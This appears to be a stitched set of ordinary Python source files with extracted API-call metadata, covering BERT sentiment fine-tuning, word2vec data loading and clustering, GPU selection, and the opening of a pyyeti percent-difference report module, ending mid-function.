print(f'Select the pretrained {select_models[np.argmax(get_scores)]}, and the score is {np.max(get_scores)}')
def main(args):
main_L2L(args)
def parse_args(args):
parser = argparse.ArgumentParser(description='Datasets analysis')
parser.add_argument('--input_dataset', default='test.smi', type=str)
parser.add_argument('--num_workers', default=1, type=int)
args = parser.parse_args()
return args
def cli_main():
args = parse_args(sys.argv[1:])
# print(args)
main(args)
if __name__ == "__main__":
cli_main()
print('End!')
|
[
"pandas.read_csv",
"numpy.array",
"numpy.arange",
"os.path.exists",
"sklearn.linear_model.RidgeClassifier",
"numpy.reshape",
"argparse.ArgumentParser",
"sklearn.decomposition.PCA",
"numpy.max",
"os.path.split",
"scipy.stats.wasserstein_distance",
"numpy.vstack",
"numpy.round",
"datasets_analysis_module.target_analysis",
"numpy.argmax",
"numpy.shape",
"datasets_analysis_module.parallel_operation",
"scipy.special.kl_div",
"sklearn.preprocessing.StandardScaler",
"numpy.load"
] |
[((1918, 1936), 'numpy.round', 'np.round', (['w_dis', '(4)'], {}), '(w_dis, 4)\n', (1926, 1936), True, 'import numpy as np\n'), ((4358, 4388), 'sklearn.linear_model.RidgeClassifier', 'linear_model.RidgeClassifier', ([], {}), '()\n', (4386, 4388), False, 'from sklearn import linear_model\n'), ((4600, 4616), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (4614, 4616), False, 'from sklearn.preprocessing import StandardScaler\n'), ((6309, 6353), 'pandas.read_csv', 'pd.read_csv', (['filename'], {'header': '(0)', 'index_col': '(0)'}), '(filename, header=0, index_col=0)\n', (6320, 6353), True, 'import pandas as pd\n'), ((6661, 6710), 'numpy.vstack', 'np.vstack', (['[features, customized_dataset_feature]'], {}), '([features, customized_dataset_feature])\n', (6670, 6710), True, 'import numpy as np\n'), ((7865, 7921), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Datasets analysis"""'}), "(description='Datasets analysis')\n", (7888, 7921), False, 'import argparse\n'), ((1690, 1730), 'scipy.stats.wasserstein_distance', 'wasserstein_distance', (['values_0', 'values_1'], {}), '(values_0, values_1)\n', (1710, 1730), False, 'from scipy.stats import wasserstein_distance\n'), ((2079, 2126), 'os.path.exists', 'os.path.exists', (['pretrain_sets_distribution_path'], {}), '(pretrain_sets_distribution_path)\n', (2093, 2126), False, 'import os\n'), ((4632, 4647), 'numpy.vstack', 'np.vstack', (['args'], {}), '(args)\n', (4641, 4647), True, 'import numpy as np\n'), ((5122, 5144), 'datasets_analysis_module.target_analysis', 'dam.target_analysis', (['k'], {}), '(k)\n', (5141, 5144), True, 'import datasets_analysis_module as dam\n'), ((5390, 5446), 'datasets_analysis_module.parallel_operation', 'dam.parallel_operation', (['file', 'num_workers', 'specific_func'], {}), '(file, num_workers, specific_func)\n', (5412, 5446), True, 'import datasets_analysis_module as dam\n'), ((5901, 5938), 'numpy.reshape', 'np.reshape', (['all_features', '[1, 63 * 3]'], {}), '(all_features, [1, 63 * 3])\n', (5911, 5938), True, 'import numpy as np\n'), ((6225, 6249), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (6239, 6249), False, 'import os\n'), ((6983, 7007), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': 'redu_i'}), '(n_components=redu_i)\n', (6986, 7007), False, 'from sklearn.decomposition import PCA\n'), ((1389, 1439), 'numpy.array', 'np.array', (['[distr_dict_0[k] for k in sorted_keys_0]'], {}), '([distr_dict_0[k] for k in sorted_keys_0])\n', (1397, 1439), True, 'import numpy as np\n'), ((1576, 1626), 'numpy.array', 'np.array', (['[distr_dict_1[k] for k in sorted_keys_1]'], {}), '([distr_dict_1[k] for k in sorted_keys_1])\n', (1584, 1626), True, 'import numpy as np\n'), ((2298, 2357), 'numpy.load', 'np.load', (['pretrain_sets_distribution_path'], {'allow_pickle': '(True)'}), '(pretrain_sets_distribution_path, allow_pickle=True)\n', (2305, 2357), True, 'import numpy as np\n'), ((1782, 1822), 'scipy.special.kl_div', 'scipy.special.kl_div', (['values_0', 'values_1'], {}), '(values_0, values_1)\n', (1802, 1822), False, 'import scipy\n'), ((6939, 6957), 'numpy.shape', 'np.shape', (['features'], {}), '(features)\n', (6947, 6957), True, 'import numpy as np\n'), ((7769, 7787), 'numpy.max', 'np.max', (['get_scores'], {}), '(get_scores)\n', (7775, 7787), True, 'import numpy as np\n'), ((1865, 1883), 'numpy.array', 'np.array', (['values_0'], {}), '(values_0)\n', (1873, 1883), True, 'import numpy as np\n'), ((1886, 1904), 'numpy.array', 'np.array', (['values_1'], {}), '(values_1)\n', (1894, 1904), True, 'import numpy as np\n'), ((4939, 4958), 'os.path.split', 'os.path.split', (['file'], {}), '(file)\n', (4952, 4958), False, 'import os\n'), ((7726, 7747), 'numpy.argmax', 'np.argmax', (['get_scores'], {}), '(get_scores)\n', (7735, 7747), True, 'import numpy as np\n'), ((3942, 3956), 'numpy.round', 'np.round', (['w', '(2)'], {}), '(w, 2)\n', (3950, 3956), True, 'import numpy as np\n'), ((3966, 3993), 'numpy.arange', 'np.arange', (['(0.0)', '(1.001)', '(0.01)'], {}), '(0.0, 1.001, 0.01)\n', (3975, 3993), True, 'import numpy as np\n'), ((6436, 6460), 'numpy.shape', 'np.shape', (['data_df.values'], {}), '(data_df.values)\n', (6444, 6460), True, 'import numpy as np\n')]
|
import os
import argparse
import json
from datetime import datetime
import numpy as np
from sklearn.utils.class_weight import compute_class_weight
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import confusion_matrix
from tensorflow import keras
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
import bert # https://github.com/kpe/bert-for-tf2/
from onecycle import OneCycleScheduler # https://www.avanwyk.com/tensorflow-2-super-convergence-with-the-1cycle-policy/
from imdb import get_imdb_data
from tweets import get_tweets_data
from amazon import get_reviews_data
parser = argparse.ArgumentParser()
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
parser.add_argument("--experiment_name", type=str, default=current_time, help="Insert string defining your experiment. Defaults to datetime.now()")
parser.add_argument("--task", type=str, required=True, help="One of imdb, reviews, or tweets.")
parser.add_argument("--subtask", type=str, default="german", help="One of german or multi. Ignored for imdb task.")
parser.add_argument("--ckpt_name", type=str, default="bert_model.ckpt", help="Name of BERT checkpoint to load.")
parser.add_argument("--bert_base_path", type=str, default="D:/bert_models/", help="Where to find BERT models.")
parser.add_argument("--model_name", type=str, default=None, help="Name of BERT model. Default depends on task.")
parser.add_argument("--data_dir", type=str, default="data", help="Data directory.")
parser.add_argument("--log_dir", type=str, default="D:\\logs", help="Log directory.")
# training parameters
parser.add_argument("--batch_size", type=int, default=2, help="Batch size.")
parser.add_argument("--patience", type=int, default=3, help="Patience for early stopping.")
parser.add_argument("--learning_rate", type=float, default=2e-5, help="Learning rate.")
parser.add_argument("--max_seq_length", type=int, default=512, help="Maximum frequence length.")
parser.add_argument("--no_class_weights", action='store_true', help="Don't use class weights.")
parser.add_argument("--num_epochs", type=int, default=3, help="Maximum number of epochs.")
parser.add_argument("--test_size", type=float, default=None, help="Test size. Default depends on task.")
parser.add_argument("--num_categories", type=int, default=None, help="Number of categoroies. Defaults to 2 for imdb, 3 otherwise.")
parser.add_argument("--polarized", action='store_true', help="For reviews data: if true and num_categories=3, count only 1 and 5 as pos/neg")
# read variables
ARGS = parser.parse_args()
experiment_name = ARGS.experiment_name
batch_size = ARGS.batch_size
learning_rate = ARGS.learning_rate
max_seq_length = ARGS.max_seq_length
ckpt_name = ARGS.ckpt_name
use_class_weights = not ARGS.no_class_weights
num_epochs = ARGS.num_epochs
task = ARGS.task
bert_base_path = ARGS.bert_base_path
num_categories = ARGS.num_categories
model_name = ARGS.model_name
test_size = ARGS.test_size
subtask = ARGS.subtask
data_dir = ARGS.data_dir
log_dir = ARGS.log_dir
patience = ARGS.patience
polarized = ARGS.polarized
print('Experiment name is ' + experiment_name + '.')
if task == "imdb":
if model_name == None:
model_name = "uncased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 2
elif task == "tweets":
if model_name == None:
model_name = "bert_base_german_cased" if subtask == "german" else "multi_cased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 3
if test_size == None:
test_size = 0.2
elif task == "reviews":
if model_name == None:
model_name = "bert_base_german_cased" if subtask == "german" else "multi_cased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 3
if test_size == None:
test_size = 0.5
else:
raise Exception('No such task.')
ARGS.model_name = model_name
ARGS.num_categories = num_categories
ARGS.test_size = test_size
log_dir = os.path.join(log_dir, experiment_name)
data_dir = os.path.join(data_dir, task)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
config = vars(ARGS)
json.dump(config, open(os.path.join(log_dir, 'config.json'), 'w'), indent=4, sort_keys=True)
if subtask != 'german' and subtask != 'multi':
raise Exception("No such subtask.")
def get_data(task, subtask, num_categories, data_dir, tokenizer, max_seq_length, test_size):
if task == "imdb":
print("Ignoging test_size for imdb data.")
return get_imdb_data(data_dir, tokenizer, max_seq_length)
elif task == "tweets":
return get_tweets_data(data_dir, subtask, num_categories, tokenizer, max_seq_length, test_size)
elif task == "reviews":
return get_reviews_data(data_dir, subtask, num_categories, tokenizer, max_seq_length, test_size, polarized)
else:
raise Exception('No such task.')
if __name__ == "__main__":
bert_path = os.path.join(bert_base_path, model_name)
model_ckpt = os.path.join(bert_path, ckpt_name)
do_lower_case = model_name.find("uncased") != -1
bert.bert_tokenization.validate_case_matches_checkpoint(do_lower_case, model_ckpt)
vocab_file = os.path.join(bert_path, "vocab.txt")
tokenizer = bert.bert_tokenization.FullTokenizer(vocab_file, do_lower_case)
( train_input_ids,
train_input_masks,
train_segment_ids,
train_labels,
test_input_ids,
test_input_masks,
test_segment_ids,
test_labels
) = get_data(task, subtask, num_categories, data_dir, tokenizer, max_seq_length, test_size)
steps = np.ceil(train_input_ids.shape[0] / batch_size) * num_epochs
lr_schedule = OneCycleScheduler(learning_rate, steps)
es = EarlyStopping(monitor='val_SparseCategoricalAccuracy', mode='max', verbose=1, patience=patience)
mc = ModelCheckpoint(os.path.join(log_dir, 'best_model.h5'), monitor='val_SparseCategoricalAccuracy', mode='max', save_best_only=True, save_weights_only=True)
bert_params = bert.params_from_pretrained_ckpt(bert_path)
l_bert = bert.BertModelLayer.from_params(bert_params, name="bert")
in_id = keras.layers.Input(shape=(max_seq_length,), name="input_ids")
bert_output = l_bert(in_id)[:, 0, :]
dropout = keras.layers.Dropout(0.5)(bert_output)
dense = keras.layers.Dense(768, activation="relu")(dropout)
dropout = keras.layers.Dropout(0.5)(dense)
pred = keras.layers.Dense(num_categories, activation=None)(dropout)
model = keras.models.Model(inputs=in_id, outputs=pred)
opt = keras.optimizers.Nadam()
model.compile(loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), optimizer=opt, metrics=['SparseCategoricalAccuracy'])
bert.load_bert_weights(l_bert, model_ckpt)
model.summary()
tensorboard_callback = keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0,
write_graph=False, write_images=False, update_freq=1000)
y = np.concatenate([train_labels, test_labels]).flatten()
wgt = compute_class_weight('balanced', np.unique(y), y)
if not use_class_weights:
wgt = (wgt * 0 + 1) / num_categories
print('Class weights:', wgt)
model.fit(
train_input_ids,
train_labels,
class_weight=wgt,
validation_data=(test_input_ids, test_labels),
shuffle=True,
epochs=num_epochs,
batch_size=batch_size,
callbacks=[tensorboard_callback, es, mc, lr_schedule]
)
model.load_weights(os.path.join(log_dir, 'best_model.h5'))
print("Reloaded best parameters.")
y_pred = model.predict(test_input_ids)
y_pred = np.argmax(y_pred, axis=1)
matrix = confusion_matrix(test_labels, y_pred)
print(matrix.diagonal()/matrix.sum(axis=1))
BMAC = balanced_accuracy_score(test_labels, y_pred)
print(BMAC)
|
[
"sklearn.metrics.balanced_accuracy_score",
"bert.load_bert_weights",
"tensorflow.keras.callbacks.EarlyStopping",
"onecycle.OneCycleScheduler",
"tensorflow.keras.layers.Dense",
"amazon.get_reviews_data",
"os.path.exists",
"tensorflow.keras.layers.Input",
"bert.BertModelLayer.from_params",
"tensorflow.keras.optimizers.Nadam",
"argparse.ArgumentParser",
"bert.params_from_pretrained_ckpt",
"numpy.concatenate",
"tensorflow.keras.models.Model",
"sklearn.metrics.confusion_matrix",
"numpy.ceil",
"tensorflow.keras.callbacks.TensorBoard",
"tensorflow.keras.losses.SparseCategoricalCrossentropy",
"bert.bert_tokenization.FullTokenizer",
"tensorflow.keras.layers.Dropout",
"numpy.argmax",
"tweets.get_tweets_data",
"numpy.unique",
"os.makedirs",
"os.path.join",
"datetime.datetime.now",
"imdb.get_imdb_data",
"bert.bert_tokenization.validate_case_matches_checkpoint"
] |
[((627, 652), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (650, 652), False, 'import argparse\n'), ((3962, 4000), 'os.path.join', 'os.path.join', (['log_dir', 'experiment_name'], {}), '(log_dir, experiment_name)\n', (3974, 4000), False, 'import os\n'), ((4012, 4040), 'os.path.join', 'os.path.join', (['data_dir', 'task'], {}), '(data_dir, task)\n', (4024, 4040), False, 'import os\n'), ((4057, 4080), 'os.path.exists', 'os.path.exists', (['log_dir'], {}), '(log_dir)\n', (4071, 4080), False, 'import os\n'), ((4086, 4106), 'os.makedirs', 'os.makedirs', (['log_dir'], {}), '(log_dir)\n', (4097, 4106), False, 'import os\n'), ((4914, 4954), 'os.path.join', 'os.path.join', (['bert_base_path', 'model_name'], {}), '(bert_base_path, model_name)\n', (4926, 4954), False, 'import os\n'), ((4972, 5006), 'os.path.join', 'os.path.join', (['bert_path', 'ckpt_name'], {}), '(bert_path, ckpt_name)\n', (4984, 5006), False, 'import os\n'), ((5064, 5150), 'bert.bert_tokenization.validate_case_matches_checkpoint', 'bert.bert_tokenization.validate_case_matches_checkpoint', (['do_lower_case', 'model_ckpt'], {}), '(do_lower_case,\n model_ckpt)\n', (5119, 5150), False, 'import bert\n'), ((5164, 5200), 'os.path.join', 'os.path.join', (['bert_path', '"""vocab.txt"""'], {}), "(bert_path, 'vocab.txt')\n", (5176, 5200), False, 'import os\n'), ((5217, 5280), 'bert.bert_tokenization.FullTokenizer', 'bert.bert_tokenization.FullTokenizer', (['vocab_file', 'do_lower_case'], {}), '(vocab_file, do_lower_case)\n', (5253, 5280), False, 'import bert\n'), ((5682, 5721), 'onecycle.OneCycleScheduler', 'OneCycleScheduler', (['learning_rate', 'steps'], {}), '(learning_rate, steps)\n', (5699, 5721), False, 'from onecycle import OneCycleScheduler\n'), ((5731, 5832), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_SparseCategoricalAccuracy"""', 'mode': '"""max"""', 'verbose': '(1)', 'patience': 'patience'}), "(monitor='val_SparseCategoricalAccuracy', mode='max', verbose=\n 1, patience=patience)\n", (5744, 5832), False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((6009, 6052), 'bert.params_from_pretrained_ckpt', 'bert.params_from_pretrained_ckpt', (['bert_path'], {}), '(bert_path)\n', (6041, 6052), False, 'import bert\n'), ((6066, 6123), 'bert.BertModelLayer.from_params', 'bert.BertModelLayer.from_params', (['bert_params'], {'name': '"""bert"""'}), "(bert_params, name='bert')\n", (6097, 6123), False, 'import bert\n'), ((6136, 6197), 'tensorflow.keras.layers.Input', 'keras.layers.Input', ([], {'shape': '(max_seq_length,)', 'name': '"""input_ids"""'}), "(shape=(max_seq_length,), name='input_ids')\n", (6154, 6197), False, 'from tensorflow import keras\n'), ((6487, 6533), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': 'in_id', 'outputs': 'pred'}), '(inputs=in_id, outputs=pred)\n', (6505, 6533), False, 'from tensorflow import keras\n'), ((6549, 6573), 'tensorflow.keras.optimizers.Nadam', 'keras.optimizers.Nadam', ([], {}), '()\n', (6571, 6573), False, 'from tensorflow import keras\n'), ((6717, 6759), 'bert.load_bert_weights', 'bert.load_bert_weights', (['l_bert', 'model_ckpt'], {}), '(l_bert, model_ckpt)\n', (6739, 6759), False, 'import bert\n'), ((6814, 6938), 'tensorflow.keras.callbacks.TensorBoard', 'keras.callbacks.TensorBoard', ([], {'log_dir': 'log_dir', 'histogram_freq': '(0)', 'write_graph': '(False)', 'write_images': '(False)', 'update_freq': '(1000)'}), '(log_dir=log_dir, histogram_freq=0, write_graph=\n False, write_images=False, update_freq=1000)\n', (6841, 6938), False, 'from tensorflow import keras\n'), ((7648, 7673), 'numpy.argmax', 'np.argmax', (['y_pred'], {'axis': '(1)'}), '(y_pred, axis=1)\n', (7657, 7673), True, 'import numpy as np\n'), ((7687, 7724), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['test_labels', 'y_pred'], {}), '(test_labels, y_pred)\n', (7703, 7724), False, 'from sklearn.metrics import confusion_matrix\n'), ((7784, 7828), 'sklearn.metrics.balanced_accuracy_score', 'balanced_accuracy_score', (['test_labels', 'y_pred'], {}), '(test_labels, y_pred)\n', (7807, 7828), False, 'from sklearn.metrics import balanced_accuracy_score\n'), ((669, 683), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (681, 683), False, 'from datetime import datetime\n'), ((4150, 4186), 'os.path.join', 'os.path.join', (['log_dir', '"""config.json"""'], {}), "(log_dir, 'config.json')\n", (4162, 4186), False, 'import os\n'), ((4492, 4542), 'imdb.get_imdb_data', 'get_imdb_data', (['data_dir', 'tokenizer', 'max_seq_length'], {}), '(data_dir, tokenizer, max_seq_length)\n', (4505, 4542), False, 'from imdb import get_imdb_data\n'), ((5604, 5650), 'numpy.ceil', 'np.ceil', (['(train_input_ids.shape[0] / batch_size)'], {}), '(train_input_ids.shape[0] / batch_size)\n', (5611, 5650), True, 'import numpy as np\n'), ((5853, 5891), 'os.path.join', 'os.path.join', (['log_dir', '"""best_model.h5"""'], {}), "(log_dir, 'best_model.h5')\n", (5865, 5891), False, 'import os\n'), ((6253, 6278), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.5)'], {}), '(0.5)\n', (6273, 6278), False, 'from tensorflow import keras\n'), ((6304, 6346), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(768)'], {'activation': '"""relu"""'}), "(768, activation='relu')\n", (6322, 6346), False, 'from tensorflow import keras\n'), ((6370, 6395), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.5)'], {}), '(0.5)\n', (6390, 6395), False, 'from tensorflow import keras\n'), ((6414, 6465), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['num_categories'], {'activation': 'None'}), '(num_categories, activation=None)\n', (6432, 6465), False, 'from tensorflow import keras\n'), ((7065, 7077), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (7074, 7077), True, 'import numpy as np\n'), ((7513, 7551), 'os.path.join', 'os.path.join', (['log_dir', '"""best_model.h5"""'], {}), "(log_dir, 'best_model.h5')\n", (7525, 7551), False, 'import os\n'), ((4585, 4677), 'tweets.get_tweets_data', 'get_tweets_data', (['data_dir', 'subtask', 'num_categories', 'tokenizer', 'max_seq_length', 'test_size'], {}), '(data_dir, subtask, num_categories, tokenizer,\n max_seq_length, test_size)\n', (4600, 4677), False, 'from tweets import get_tweets_data\n'), ((6597, 6657), 'tensorflow.keras.losses.SparseCategoricalCrossentropy', 'keras.losses.SparseCategoricalCrossentropy', ([], {'from_logits': '(True)'}), '(from_logits=True)\n', (6639, 6657), False, 'from tensorflow import keras\n'), ((6968, 7011), 'numpy.concatenate', 'np.concatenate', (['[train_labels, test_labels]'], {}), '([train_labels, test_labels])\n', (6982, 7011), True, 'import numpy as np\n'), ((4717, 4821), 'amazon.get_reviews_data', 'get_reviews_data', (['data_dir', 'subtask', 'num_categories', 'tokenizer', 'max_seq_length', 'test_size', 'polarized'], {}), '(data_dir, subtask, num_categories, tokenizer,\n max_seq_length, test_size, polarized)\n', (4733, 4821), False, 'from amazon import get_reviews_data\n')]
|
# -*- coding: utf-8 -*-
import gensim
import numpy as np
from sklearn.cluster import MiniBatchKMeans
def read_data_batches(path, batch_size=50, minlength=5):
"""
Reading batched texts of given min. length
:param path: path to the text file ``one line -- one normalized sentence''
:return: batches iterator
"""
batch = []
for line in open(path, encoding="utf-8"):
line = line.strip().split()
# lines with less than `minlength` words are omitted
if len(line) >= minlength:
batch.append(line)
if len(batch) >= batch_size:
yield batch
batch = []
if len(batch) > 0:
yield batch
def text2vectors(text, w2v_model, maxlen, vocabulary):
"""
Token sequence -- to a list of word vectors;
if token not in vocabulary, it is skipped; the rest of
the slots up to `maxlen` are replaced with zeroes
:param text: list of tokens
:param w2v_model: gensim w2v model
:param maxlen: max. length of the sentence; the rest is just cut away
:return:
"""
acc_vecs = []
for word in text:
if word in w2v_model.wv.index_to_key and (vocabulary is None or word in vocabulary):
acc_vecs.append(w2v_model.wv[word])
# padding for consistent length with ZERO vectors
if len(acc_vecs) < maxlen:
acc_vecs.extend([np.zeros(w2v_model.vector_size)] * (maxlen - len(acc_vecs)))
return acc_vecs
def get_w2v(path):
"""
Reading word2vec model given the path
"""
return gensim.models.Word2Vec.load(path)
def read_data_tensors(path, word_vectors_path=None,
batch_size=50, vocabulary=None,
maxlen=100, pad_value=0, minsentlength=5):
"""
Data for training the NN -- from text file to word vectors sequences batches
:param path:
:param word_vectors_path:
:param batch_size:
:param vocabulary:
:param maxlen:
:param pad_value:
:param minsentlength:
:return:
"""
w2v_model = get_w2v(word_vectors_path)
for batch in read_data_batches(path, batch_size, minsentlength):
batch_vecs = []
batch_texts = []
for text in batch:
vectors_as_list = text2vectors(text, w2v_model, maxlen, vocabulary)
batch_vecs.append(np.asarray(vectors_as_list[:maxlen], dtype=np.float32))
batch_texts.append(text)
yield np.stack(batch_vecs, axis=0), batch_texts
def get_centroids(w2v_model, aspects_count):
"""
Clustering all word vectors with K-means and returning L2-normalizes
cluster centroids; used for ABAE aspects matrix initialization
"""
km = MiniBatchKMeans(n_clusters=aspects_count, verbose=0, n_init=100)
m = []
for k in w2v_model.wv.key_to_index:
m.append(w2v_model.wv[k])
m = np.matrix(m)
km.fit(m)
clusters = km.cluster_centers_
# L2 normalization
norm_aspect_matrix = clusters / np.linalg.norm(clusters, axis=-1, keepdims=True)
return norm_aspect_matrix
if __name__ == "__main__":
for b in read_data_tensors("preprocessed_data/listings.txt", "word_vectors/listings.w2v", batch_size=3):
print(b[0].shape, b[1][:2])
|
[
"gensim.models.Word2Vec.load",
"sklearn.cluster.MiniBatchKMeans",
"numpy.asarray",
"numpy.stack",
"numpy.zeros",
"numpy.linalg.norm",
"numpy.matrix"
] |
[((1577, 1610), 'gensim.models.Word2Vec.load', 'gensim.models.Word2Vec.load', (['path'], {}), '(path)\n', (1604, 1610), False, 'import gensim\n'), ((2729, 2793), 'sklearn.cluster.MiniBatchKMeans', 'MiniBatchKMeans', ([], {'n_clusters': 'aspects_count', 'verbose': '(0)', 'n_init': '(100)'}), '(n_clusters=aspects_count, verbose=0, n_init=100)\n', (2744, 2793), False, 'from sklearn.cluster import MiniBatchKMeans\n'), ((2889, 2901), 'numpy.matrix', 'np.matrix', (['m'], {}), '(m)\n', (2898, 2901), True, 'import numpy as np\n'), ((3012, 3060), 'numpy.linalg.norm', 'np.linalg.norm', (['clusters'], {'axis': '(-1)', 'keepdims': '(True)'}), '(clusters, axis=-1, keepdims=True)\n', (3026, 3060), True, 'import numpy as np\n'), ((2358, 2412), 'numpy.asarray', 'np.asarray', (['vectors_as_list[:maxlen]'], {'dtype': 'np.float32'}), '(vectors_as_list[:maxlen], dtype=np.float32)\n', (2368, 2412), True, 'import numpy as np\n'), ((2466, 2494), 'numpy.stack', 'np.stack', (['batch_vecs'], {'axis': '(0)'}), '(batch_vecs, axis=0)\n', (2474, 2494), True, 'import numpy as np\n'), ((1401, 1432), 'numpy.zeros', 'np.zeros', (['w2v_model.vector_size'], {}), '(w2v_model.vector_size)\n', (1409, 1432), True, 'import numpy as np\n')]
|
from __future__ import absolute_import
import os
import errno
import numpy as np
def mkdir_if_missing(dir_path):
try:
os.makedirs(dir_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def get_free_gpu():
os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')
memory_available = [int(x.split()[2]) for x in open('tmp', 'r').readlines()]
print('Assigning workflow to GPU: ' + str(np.argmax(memory_available)))
return np.argmax(memory_available)
|
[
"os.system",
"numpy.argmax",
"os.makedirs"
] |
[((260, 325), 'os.system', 'os.system', (['"""nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp"""'], {}), "('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')\n", (269, 325), False, 'import os\n'), ((494, 521), 'numpy.argmax', 'np.argmax', (['memory_available'], {}), '(memory_available)\n', (503, 521), True, 'import numpy as np\n'), ((133, 154), 'os.makedirs', 'os.makedirs', (['dir_path'], {}), '(dir_path)\n', (144, 154), False, 'import os\n'), ((453, 480), 'numpy.argmax', 'np.argmax', (['memory_available'], {}), '(memory_available)\n', (462, 480), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Low level tool for writing percent difference reports. Typically, this
is called via: :func:`cla.DR_Results.rptpct`.
"""
from io import StringIO
from types import SimpleNamespace
import warnings
import numpy as np
import matplotlib.pyplot as plt
from pyyeti import ytools, locate, writer
from ._utilities import _get_rpt_headers, _get_numform, _proc_filterval
from ._magpct import magpct
__all__ = ["rptpct1"]
# FIXME: We need the str/repr formatting used in Numpy < 1.14.
try:
np.set_printoptions(legacy="1.13")
except TypeError:
pass
def _apply_pv(value, pv, oldlen):
# if value has a len that's > 1, try to partition it down;
# otherwise, return it as is:
try:
n = len(value)
except TypeError:
return value
else:
if n == 1:
return value
# `value` is a vector with len > 1 ... ensure it is a true numpy
# array:
value = np.atleast_1d(value)
# oldlen is either 0 (for `value` vectors that are expected to be
# full size ... currently, only the `filterval` and
# `magpct_filterval` vectors), or it is the length of the
# dimension that the `value` index type of partition vector
# (currently, only the `ignorepv` vector) was originally defined
# to partition.
if oldlen == 0:
# `value` is `filterval` or `magpct_filterval` ... these just
# need to be partitioned down:
newvalue = value[pv]
else:
# `value` is `ignorepv` ... it needs to be redefined to
# correspond to reduced size:
truefalse = locate.index2bool(value, oldlen)
newvalue = truefalse[pv].nonzero()[0]
return newvalue
def _align_mxmn(mxmn1, mxmn2, labels2, row_number, infodct):
if infodct["labels"] and infodct["labels"] != labels2:
n = len(infodct["labels"])
pv1, pv2 = locate.list_intersect(infodct["labels"], labels2)
mxmn1 = mxmn1[pv1]
mxmn2 = mxmn2[pv2]
infodct["labels"] = [infodct["labels"][i] for i in pv1]
row_number = row_number[pv1]
infodct["filterval"] = _apply_pv(infodct["filterval"], pv1, 0)
infodct["magpct_filterval"] = _apply_pv(infodct["magpct_filterval"], pv1, 0)
infodct["ignorepv"] = _apply_pv(infodct["ignorepv"], pv1, n)
return mxmn1, mxmn2, row_number
def _get_filtline(filterval):
if len(filterval) > 1:
filtline = "Filter: <defined row-by-row>\n"
else:
filtline = f"Filter: {filterval[0]}\n"
return filtline
def _get_noteline(use_range, names, prtbads, flagbads):
noteline = "Notes: "
tab = " "
if not use_range:
noteline += "% Diff = +/- abs(({0}-{1})/{1})*100\n".format(*names)
else:
noteline += "% Diff = +/- abs({0}-{1})/max(abs({1}(max,min)))*100\n".format(
*names
)
noteline += tab + "Sign set such that positive % differences indicate exceedances\n"
prtbad, prtbadh, prtbadl = prtbads
flagbad, flagbadh, flagbadl = flagbads
if prtbad is not None or prtbadh is not None or prtbadl is not None:
if prtbad is not None:
prtbad = abs(prtbad)
noteline += tab + f"Printing rows where abs(% Diff) > {prtbad}%\n"
elif prtbadh is not None:
noteline += tab + f"Printing rows where % Diff > {prtbadh}%\n"
else:
noteline += tab + f"Printing rows where % Diff < {prtbadl}%\n"
if flagbad is not None or flagbadh is not None or flagbadl is not None:
if flagbad is not None:
flagbad = abs(flagbad)
noteline += tab + f"Flagging (*) rows where abs(% Diff) > {flagbad}%\n"
elif flagbadh is not None:
noteline += tab + f"Flagging (*) rows where % Diff > {flagbadh}%\n"
else:
noteline += tab + f"Flagging (*) rows where % Diff < {flagbadl}%\n"
return noteline
def _get_badpv(pct, pv, bad, badh, badl, defaultpv=False):
if bad is not None or badh is not None or badl is not None:
badpv = pv.copy()
if bad is not None:
badpv &= abs(pct) > bad
elif badh is not None:
badpv &= pct > badh
else:
badpv &= pct < badl
else:
badpv = np.empty(len(pct), bool)
badpv[:] = defaultpv
return badpv
def _get_pct_diff(a, b, filt, pv, nastring, mxmn_b=None, ismax=True, flagbads=None):
# either can pass filter to be kept:
pv &= (abs(a) > filt) | (abs(b) > filt)
if mxmn_b is not None:
denom = np.nanmax(abs(mxmn_b), axis=1)
else:
denom = abs(b)
# put 1's in for filtered values ... this is temporary
a = a.copy()
b = b.copy()
a[~pv] = 1.0
b[~pv] = 1.0
z = denom == 0.0
denom[z] = 1.0
pct = 100 * abs(a - b) / denom
pct[z] = 100.0 # np.inf
# make less extreme values negative
neg = a < b if ismax else a > b
pct[neg] *= -1.0
# put nan's in for the filtered or n/a rows:
pct[~pv] = np.nan
# make 7 char version:
spct = [f"{p:7.2f}" for p in pct]
badpv = _get_badpv(pct, pv, *flagbads, False)
for j in badpv.nonzero()[0]:
spct[j] += "*"
for j in (~pv).nonzero()[0]:
spct[j] = nastring
return pct, spct
def _get_histogram_str(desc, hdr, pctinfo):
pctcount = pctinfo["hsto"]
s = [
(f"\n\n {desc} - {hdr} Comparison Histogram\n\n"),
(" % Diff Count Percent\n -------- -------- -------\n"),
]
with StringIO() as f:
writer.vecwrite(f, " {:8.2f} {:8.0f} {:7.2f}\n", pctcount)
s.append(f.getvalue())
s.append("\n")
